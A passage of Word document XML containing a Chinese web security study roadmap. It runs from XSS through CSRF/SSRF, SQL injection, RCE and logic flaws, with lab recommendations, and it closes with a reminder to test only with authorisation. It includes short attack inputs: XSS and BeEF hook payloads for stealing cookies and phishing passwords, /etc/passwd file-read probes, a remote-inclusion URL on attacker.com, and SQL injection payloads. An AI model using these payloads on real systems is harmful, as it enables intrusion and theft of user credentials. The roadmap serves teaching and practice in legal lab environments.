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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Web安全实战进阶学习路线图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>从文件上传到全栈Web安全工程师</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:br/>
        <w:t>适用对象：已掌握文件上传漏洞原理与利用的学习者</w:t>
        <w:br/>
        <w:t>编制日期：2026年6月1日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、学习总纲 - 知识体系全景图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>你的当前定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>你已经完成了文件上传漏洞的学习，能够：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>理解前端JS验证与后端MIME、扩展名、内容检测的区别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>绕过黑白名单、解析漏洞、.htaccess、竞争条件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>构造图片马、二次渲染绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>在合法靶场中独立完成文件上传漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>接下来你应该掌握的核心漏洞路线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC3300"/>
        </w:rPr>
        <w:t>文件上传 -&gt; XSS -&gt; CSRF/SSRF -&gt; SQL注入进阶 -&gt; RCE -&gt; 逻辑漏洞 -&gt; 综合渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>每个阶段都包含：漏洞原理 -&gt; 手工利用 -&gt; 工具利用 -&gt; 绕过技巧 -&gt; 防护修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、第二阶段：XSS跨站脚本攻击（预计2周）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 基础认知</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>XSS（Cross-Site Scripting）是OWASP Top 10中常年位居前列的漏洞。攻击者将恶意脚本注入到网页中，当其他用户浏览时执行。分类：反射型、存储型、DOM型三种。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 反射型XSS（第1-2天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>原理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>攻击脚本存在于URL参数中，服务端直接将参数内容回显到页面，不经过滤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>靶场推荐：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>DVWA各难度 -&gt; Pikachu XSS模块 -&gt; PortSwigger XSS实验室</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>手工测试步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>步骤1：找输入点 - 搜索框、URL参数、表单提交</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>步骤2：基础测试 - 输入 &lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>步骤3：确认弹窗后，尝试其他标签如 &lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>步骤4：查看网页源码，确认payload插入的位置和上下文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>步骤5：根据不同上下文选择不同的闭合策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>完成标志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>能在DVWA任意难度下实现反射型XSS弹窗，并能解释为什么不同难度下payload不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 存储型XSS（第3-4天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>恶意脚本被持久化存储在服务端（数据库、文件等），每次访问页面都会触发。常见场景：留言板、评论区、个人资料、头像上传处的filename字段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>与反射型的区别：反射型只影响点击了链接的用户；存储型影响所有访问页面的用户，危害更大。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验收任务：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在Pikachu平台的存储型XSS模块，写入一个能永久弹窗的payload，刷新页面后仍然触发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 DOM型XSS（第5-6天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>完全在前端发生，服务端不参与。通过前端JavaScript动态修改DOM时，将不可信数据插入HTML。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>典型函数：innerHTML、document.write、eval、location.hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>关键区分：反射型和存储型的payload会到达服务端；DOM型全程在前端执行，服务端日志中没有payload痕迹。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 XSS绕过技巧（第7-8天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. 大小写混写绕过：&lt;ScRiPt&gt;、&lt;sCrIpT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. 关键字过滤绕过：使用Unicode编码等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. 双写绕过：&lt;scscriptript&gt; -&gt; 过滤后变成&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. HTML实体编码绕过：&amp;lt;script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. 伪协议绕过：javascript:alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>6. 利用不同标签：&lt;svg onload=alert(1)&gt;、&lt;body onload=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.6 XSS与BeEF组合拳（第9-10天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>BeEF（Browser Exploitation Framework）是一个浏览器利用框架。当受害者浏览器执行了你的XSS后，被Hook到BeEF控制台，你可以远程控制受害者浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>部署BeEF服务端（Kali自带或docker安装）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>使用XSS注入 &lt;script src="http://你的IP:3000/hook.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>在BeEF控制台看到绿色勾的在线浏览器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>尝试执行命令：获取Cookie、键盘记录、内网扫描、截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>尝试钓鱼模块：伪造登录框获取密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.7 防护措施</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>输入过滤：strip_tags()、htmlspecialchars() 等函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>输出编码：根据上下文选择HTML实体编码、JS编码、URL编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CSP内容安全策略：Content-Security-Policy 头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>HttpOnly Cookie标记：防止XSS偷Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>X-XSS-Protection响应头（了解即可，现代浏览器已弃用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、第三阶段：CSRF与SSRF（预计1.5周）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 CSRF跨站请求伪造（第1-3天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>原理：用户已登录A网站，攻击者诱导用户点击链接访问B网站，B网站向A网站发起伪造请求，A网站误以为是用户本人的操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>在靶场中找一个修改密码或修改个人资料的POST请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>用Burp Suite抓包，看请求中是否有Token或Referer验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>构造一个伪造表单页面（HTML），让已登录的用户点击提交</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>使用Burp的CSRF PoC生成器自动生成表单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>验证成功：用户无感知地执行了操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 SSRF服务端请求伪造（第4-5天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>原理：服务端从用户传入的URL获取资源（如远程图片抓取、URL预览、Webhook回调），攻击者传入内部地址实现内网探测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>找功能点：图片上传/下载、URL转发、网页截图、PDF生成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>测试内网地址：http://127.0.0.1:80、http://10.0.0.1:22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>file协议：file:///etc/passwd（读取本地文件）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>利用 dict、gopher 协议扩大攻击面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SSRF绕过：DNS重绑定、短链接、URL解析差异</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、第四阶段：SQL注入进阶（预计2周）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>你已经掌握了基础SQL注入（如 or 1=1、union联合查询）。现在进入进阶内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 报错注入（第1-2天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>当页面不返回查询结果，但会显示SQL错误信息时使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>updatexml(1, concat(0x7e, (select database()), 0x7e), 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>extractvalue(1, concat(0x7e, (select database()), 0x7e))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>floor(rand(0)*2) group by 报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 布尔盲注与时间盲注（第3-5天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>适用场景：页面不显示数据内容，也不报错，只有是/否两种状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>布尔盲注：根据页面返回True/False，逐字符猜解数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>时间盲注：if(条件, sleep(5), 0) - 通过响应时间推断数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>推荐工具：sqlmap --technique=B (布尔) / sqlmap --technique=T (时间)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 二次注入与堆叠注入（第6-7天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>二次注入：第一次插入经过转义的数据，第二次使用时直接拼接造成注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>堆叠注入：使用分号分隔多条SQL语句，危害极大，可增删改表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、第五阶段：命令/代码执行（预计1.5周）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 RCE远程命令执行（第1-3天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>常见函数：system()、exec()、shell_exec()、passthru()、popen()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>无回显时利用：DNSlog外带、curl/wget外带、延时判断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 文件包含（第4-5天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本地文件包含LFI：../../etc/passwd、php://filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>远程文件包含RFI：http://attacker.com/shell.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>日志注入+文件包含=GetShell（经典组合技）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、第六阶段：逻辑漏洞与业务安全（预计1.5周）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 越权漏洞（第1-2天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>水平越权：A用户查看B用户的订单或个人信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>垂直越权：普通用户执行管理员操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 支付逻辑与验证码绕过（第3-5天）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>支付逻辑：修改价格参数为负数、修改数量为小数、重放请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>验证码绕过：OCR识别、前端逻辑绕过、参数复用、修改返回包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、第七阶段：综合实战与靶场训练（持续）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>当单个漏洞类型掌握后，进入综合实战阶段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>推荐靶场（按难度排序）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>1. Pikachu 皮卡丘靶场 - 适合快速上手所有漏洞类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>2. DVWA - 经典入门，分低中高三个难度</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>3. Upload-Labs - 文件上传专项，20关循序渐进</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>4. Sqli-Labs - SQL注入专项，65关全面覆盖</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. XSS-Labs - XSS专项闯关</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>6. PortSwigger Web Security Academy - 免费，世界级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>7. VulHub / VulnHub - 真实漏洞环境复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>8. HackTheBox / TryHackMe - 实战渗透平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>9. CTF题目（BugKu、BUUCTF、NSSCTF） - 题型多样</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、学习资源推荐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>书籍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>《白帽子讲Web安全》 - 吴翰清</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>《Web安全深度剖析》 - 张炳帅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>《OWASP测试指南》 - 最新版PDF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>《代码审计：企业级Web代码安全架构》 - 尹毅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>视频</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>B站：暗月渗透测试系列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>B站：小迪安全系列（偏向实战）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>YouTube：IppSec（靶机视频）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>YouTube：The Cyber Mentor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Burp Suite Professional - 抓包改包之王</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap - SQL注入自动化工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>nmap - 端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>dirsearch/gobuster - 目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>BeEF - XSS浏览器控制框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ysoserial - Java反序列化利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>蚁剑/冰蝎/哥斯拉 - Webshell管理工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>社区</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>FreeBuf - 国内安全社区</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>先知社区（阿里云） - 技术文章</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>GitHub - 开源POC和工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CNVD/CNNVD - 漏洞库查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>九、学习建议与心态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. 动手！动手！再动手！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>看10篇理论不如亲手弹一次窗。每个漏洞找靶场练至少3遍，直到不加提醒也能独立完成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. 先手动后工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>先用Burp、浏览器开发者工具手工复现漏洞，理解每一个步骤，再学用sqlmap、BeEF等工具提高效率。不要做只会点工具的脚本小子。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. 做好笔记</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>每次攻克一个漏洞，记录：漏洞原理、复现步骤、Payload、绕过技巧、修复建议。形成自己的知识库。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. 遇到问题先自己思考</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>报错了？先看浏览器控制台、看请求包、看源码。试着改变参数看页面反应有什么不同。实在不行再问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5. 保持好奇心</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>看到一个功能，多问一句：如果这里我传一个特殊值会怎样？安全工程师和普通开发者的最大区别就是这种思维方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A478A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6. 合规意识时刻在线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>永远只在授权范围内测试。所有技能学习使用合法靶场。可以在HackerOne上找合法靶场标签练手。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
